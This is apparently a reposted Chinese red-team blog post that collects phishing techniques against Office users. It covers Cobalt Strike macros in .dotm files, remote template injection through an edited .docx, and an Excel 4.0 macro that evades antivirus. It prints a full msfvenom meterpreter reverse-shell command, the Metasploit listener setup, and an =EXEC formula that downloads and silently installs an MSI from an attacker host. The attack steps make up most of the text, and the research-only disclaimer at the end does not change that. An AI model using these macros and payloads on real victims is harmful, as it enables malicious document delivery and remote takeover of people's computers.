0x01 Office钓鱼攻击
CS生成Office Payload
复制好我们的宏代码以后,我们去word里新建一个文件,创建我们需要的宏,宏的位置需要改成当前文件
复制好我们CS生成的宏代码到这里,然后改成Auto_Open
,保存为dotm文件
右键->打开并且点击启用宏即可CS上线
0x02 利用DOCX文档远程模板注入执行宏
前几步和第一种一样,后面还需要加一点内容,首先要把生成的dotm放到我们的服务器上。生成一个docx文件,把文件后缀名改成zip后解压,比如1.docx改成1.zip解压,在word_rels
文件夹下有一个setting文件,把里面的target的值改成你个人服务器上的dotm文件
如上图,然后把整个文件夹压缩成zip文件 然后把zip改成docx右键打开即可上线
0x03 Excel4.0宏躲避杀软检测
首先使用MSF生成MSI文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.169.128 lport=1234 -f msi -o hack.msi
开启监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.169.128
set lport 1234
run
新建一个excel文件,创建一个MSExcel4.0
宏表,分别在A1和A2单元格输入如下代码,并且把A1单元格命名为Auto_Open
=EXEC("msiexec /q /i http://192.168.169.128:8000/hack.msi")
=HALT()
右键打开启用宏即可MSF上线
From:https://ch1e.gitee.io
往期推荐 ●●
// 1
// 2
// 3
// 4
原文始发于微信公众号(巡安似海):红队常用钓鱼方式收集
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论